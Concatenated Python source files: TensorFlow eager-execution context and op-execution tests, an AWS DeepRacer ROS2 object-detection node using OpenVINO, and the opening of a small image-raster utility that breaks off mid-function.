def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegexp(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
test_var = variables.Variable([2., 3.])
self.assertAllEqual(test_fn(test_var), 1.0)
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.context().executor.wait()
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
object_detection_node.py
|
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
object_detection_node.py
This module creates the object_detection_node which is responsible for collecting
sensor data (camera images) from sensor_fusion_pkg and running object detection,
on specified object, providing normalized delta from target for
ftl_navigation_pkg.
The node defines:
image_subscriber: A subscriber to the /sensor_fusion_pkg/sensor_msg published
by the sensor_fusion_pkg with sensor data.
display_image_publisher: A publisher to publish the Image message using
web_video_server.
delta_publisher: A publisher to publish the normalized error (delta) of the
detected object from the target (reference) position
with respect to x and y axes.
"""
import time
import signal
import threading
import cv2
import numpy as np
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import (QoSProfile,
QoSHistoryPolicy,
QoSReliabilityPolicy)
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from deepracer_interfaces_pkg.msg import (EvoSensorMsg,
DetectionDeltaMsg)
from openvino.inference_engine import IECore
import ngraph as ng
from object_detection_pkg import (constants,
utils)
class ObjectDetectionNode(Node):
"""Node responsible for collecting sensor data (camera images) from sensor_fusion_pkg
and running object detection on specified object, providing normalized delta from target for
ftl_navigation_pkg.
"""
def __init__(self, qos_profile):
"""Create a ObjectDetectionNode.
"""
super().__init__('object_detection_node')
self.get_logger().info("object_detection_node started.")
# Double buffer to hold the input images for inference.
self.input_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Get DEVICE parameter (CPU/MYRIAD) from launch file.
self.declare_parameter("DEVICE")
self.device = self.get_parameter("DEVICE").get_parameter_value().string_value
if not self.device:
self.device = constants.DEVICE
# Check if the inference output needs to be published to localhost using web_video_server
self.declare_parameter("PUBLISH_DISPLAY_OUTPUT")
self.publish_display_output = \
self.get_parameter("PUBLISH_DISPLAY_OUTPUT").get_parameter_value().bool_value
self.get_logger().info(f"Publish output set to {self.publish_display_output}")
# Initialize Intel Inference Engine
self.init_network()
# Calculate target position for bounding box center.
self.target_x, self.target_y = self.calculate_target_center(self.w, self.h)
# Create subscription to sensor messages from camera.
self.image_subscriber = self.create_subscription(EvoSensorMsg,
constants.SENSOR_FUSION_TOPIC,
self.on_image_received_cb,
qos_profile)
# Creating publisher for display_image.
self.display_image_publisher = \
self.create_publisher(Image,
constants.DISPLAY_IMAGE_PUBLISHER_TOPIC,
10)
# Creating publisher for error (delta) from target bb position.
self.delta_publisher = self.create_publisher(DetectionDeltaMsg,
constants.DELTA_PUBLISHER_TOPIC,
qos_profile)
self.bridge = CvBridge()
# Launching a separate thread to run inference.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.run_inference)
self.thread.start()
self.thread_initialized = True
self.get_logger().info(f"Waiting for input images on {constants.SENSOR_FUSION_TOPIC}")
def init_network(self):
"""Function which initializes Intel Inference Engine.
"""
# Load OpenVINO Inference Engine.
self.get_logger().info(f"Loading Inference Engine on {self.device}")
self.ie = IECore()
# Read and load the network.
self.net = self.ie.read_network(model=constants.MODEL_XML, weights=constants.MODEL_BIN)
self.func = ng.function_from_cnn(self.net)
self.ops = self.func.get_ordered_ops()
self.exec_net = self.ie.load_network(network=self.net, device_name=self.device)
# Read expected input image info from network and prepare input blobs.
# n: batch size, c: no. of channels, h: input height, w: input width
for self.input_key in self.net.input_info:
self.input_name = self.input_key
self.n, self.c, self.h, self.w = self.net.input_info[self.input_key].input_data.shape
# Initializing to float for optimizing in later functions
self.h = float(self.h)
self.w = float(self.w)
# Prepare output blobs
self.out_blob = next(iter(self.net.outputs))
def wait_for_thread(self):
"""Function which joins the created background thread.
"""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread.
"""
self.stop_thread = True
def on_image_received_cb(self, sensor_data):
"""Call back for adding to the input double buffer whenever
new sensor image is received from sensor_fusion_node.
Args:
sensor_data (EvoSensorMsg): Message containing sensor images and lidar data.
"""
self.input_buffer.put(sensor_data)
def preprocess(self, sensor_data):
"""Method that preprocesses the input data to be provided for inference to network.
Args:
sensor_data (EvoSensorMsg): Contains sensor images and lidar data.
Returns:
image: Preprosessed image expected by the network.
"""
image = self.bridge.imgmsg_to_cv2(sensor_data.images[0])
ih, iw = image.shape[:-1]
# Resize to required input size
if (ih, iw) != (int(self.h), int(self.w)):
image = cv2.resize(image, (int(self.w), int(self.h)))
# Change data layout from HWC to CHW.
image = image.transpose((2, 0, 1))
return image
def calculate_target_center(self, image_width, image_height):
"""Method that calculates the target center's x and y co-ordinates for
bounding box to be used as reference.
Args:
image_width (int): Width of the preprocessed image.
image_height (int): Height of the preprocessed image.
Returns:
target_x, target_y (float)
"""
target_x = float(image_width) / 2.0
target_y = float(image_height) / 3.0
self.get_logger().info(f"Target Center: x={target_x} y={target_y}")
return target_x, target_y
def calculate_bb_center(self, top_left_x, top_left_y, bottom_right_x, bottom_right_y):
"""Method that calculates the bounding box center's x and y co-ordinates
representing the detected object.
Args:
top_left_x (int)
top_left_y (int)
bottom_right_x (int)
bottom_right_y (int)
Returns:
bb_center_x, bb_center_y (float): Containing the x and y coordinates of
detected bounding box center.
"""
bb_center_x = top_left_x + ((bottom_right_x - top_left_x) / 2.0)
bb_center_y = top_left_y + ((bottom_right_y - top_left_y) / 2.0)
return bb_center_x, bb_center_y
def calculate_delta(self, target_x, target_y, bb_center_x, bb_center_y):
"""Method that calculates the normalized error (delta) of the
detected object from the target (reference) position
with respect to x and y axes.
Args:
target_x (float): Target x co-ordinate.
target_y (float): Target y co-ordinate.
bb_center_x (float): x co-ordinate of center of detected bounding box.
bb_center_y (float): y co-ordinate of center of detected bounding box.
Returns:
delta (DetectionDeltaMsg): Normalized Error (delta) in x and y respectively
returned as a list of floats and converted to ObjectDetectionErrorMsg.
"""
delta_x = (bb_center_x - target_x) / self.w
delta_y = (bb_center_y - target_y) / self.h
delta = DetectionDeltaMsg()
delta.delta = [delta_x, delta_y]
self.get_logger().debug(f"Delta from target position: {delta_x} {delta_y}")
return delta
def run_inference(self):
"""Method for running inference on received input image.
"""
try:
while not self.stop_thread:
# Get an input image from double buffer.
sensor_data = self.input_buffer.get()
start_time = time.time()
# Pre-process input.
input_data = {}
input_data[self.input_name] = self.preprocess(sensor_data)
# Perform Inference.
res = self.exec_net.infer(inputs=input_data)
# Read and postprocess output.
res = res[self.out_blob]
boxes, classes = {}, {}
output_data = res[0][0]
detected = False
for number, proposal in enumerate(output_data):
# confidence for the predicted class.
confidence = proposal[2]
if (confidence > constants.CONFIDENCE_THRESHOLD and
constants.COCO_LABELS[proposal[1]] == constants.DETECT_CLASS):
# ID of the image in the batch.
imid = np.int(proposal[0])
# predicted class ID.
label = np.int(proposal[1])
# coordinates of the top left bounding box corner.
# (coordinates are in normalized format, in range [0, 1])
top_left_x = np.int(self.w * proposal[3])
top_left_y = np.int(self.h * proposal[4])
# coordinates of the bottom right bounding box corner.
# (coordinates are in normalized format, in range [0, 1])
bottom_right_x = np.int(self.w * proposal[5])
bottom_right_y = np.int(self.h * proposal[6])
# Calculate bounding box center
bb_center_x, bb_center_y = self.calculate_bb_center(top_left_x,
top_left_y,
bottom_right_x,
bottom_right_y)
# Calculate detection delta.
detection_delta = self.calculate_delta(self.target_x,
self.target_y,
bb_center_x,
bb_center_y)
# Publish to object_detection_delta topic.
self.delta_publisher.publish(detection_delta)
# Set the flag that there is a detected object.
detected = True
if imid not in boxes.keys():
boxes[imid] = []
boxes[imid].append([top_left_x, top_left_y, bottom_right_x, bottom_right_y])
if imid not in classes.keys():
classes[imid] = []
classes[imid].append(label)
# Break as soon as specified class is detected.
break
if not detected:
# Assume being at target position.
detection_delta = self.calculate_delta(self.target_x,
self.target_y,
self.target_x,
self.target_y)
self.delta_publisher.publish(detection_delta)
if self.publish_display_output:
# Change data layout from CHW to HWC.
display_image = input_data[self.input_name].transpose((1, 2, 0))
for imid in classes:
for box in boxes[imid]:
# Drawing bounding boxes on the image.
cv2.rectangle(display_image,
(box[0], box[1]),
(box[2], box[3]),
(232, 35, 244),
2)
# Printing target center on the image.
cv2.circle(display_image,
(int(self.target_x),
int(self.target_y)),
5,
(0, 255, 0),
-1)
# Publish to display topic (Can be viewed on localhost:8080).
display_image = self.bridge.cv2_to_imgmsg(np.array(display_image), "bgr8")
self.display_image_publisher.publish(display_image)
self.get_logger().info(f"Total execution time = {time.time() - start_time}")
except Exception as ex:
self.get_logger().error(f"Failed inference step: {ex}")
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST)
try:
object_detection_node = ObjectDetectionNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number
frame: the current stack frame (None or a frame object)
"""
object_detection_node.get_logger().info("Signal Handler initiated")
object_detection_node.thread_shutdown()
object_detection_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(object_detection_node, executor)
except Exception as ex:
object_detection_node.get_logger().error(f"Exception in Object Detection Node: {ex}")
object_detection_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
object_detection_node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
graphics.py
|
#!/usr/bin/python3
import numpy as np
from PIL import Image
import time
import threading
def save_image(x, path):
im = Image.fromarray(x)
im.save(path, optimize=True)
# Assumes [NCHW] format
def save_raster(x, path, rescale=False, width=None):
t = threading.Thread(target=save_raster, args=(x, path, rescale, width))
t.start()
return
def _save_raster(x, path, rescale, width):
x = to_raster(x, rescale, width)
save_image(x, path)
# Shape: (n_patches,rows,columns,channels)
def to_raster_old(x, rescale=False, width=None):
x = np.transpose(x, (0, 3, 1, 2))
#x = x.swapaxes(2, 3)
if len(x.shape) == 3:
x = x.reshape((x.shape[0], 1, x.shape[1], x.shape[2]))
if x.shape[1] == 1:
x = np.repeat(x, 3, axis=1)
if rescale:
x = (x - x.min()) / (x.max() - x.min()) * 255.
x = np.clip(x, 0, 255)
assert len(x.shape) == 4
assert x.shape[1] == 3
n_patches = x.shape[0]
if width is None:
width = int(np.ceil(np.sqrt(n_patches))) # result width
height = int(n_patches/width) # result height
tile_height = x.shape[2]
tile_width = x.shape[3]
result = np.zeros((3, int(height*tile_height),
int(width*tile_width)), dtype='uint8')
for i in range(height):
for j in range(width):
result[:, i*tile_height:(i+1)*tile_height,
j*tile_width:(j+1)*tile_width] = x[i]
return result
# Shape: (n_patches,rows,columns,channels)
def to_raster(x, rescale=False, width=None):
if len(x.shape) == 3:
x = x.reshape((x.shape[0], x.shape[1], x.shape[2], 1))
if x.shape[3] == 1:
x = np.repeat(x, 3, axis=3)
if rescale:
x = (x - x.min()) / (x.max() - x.min()) * 255.
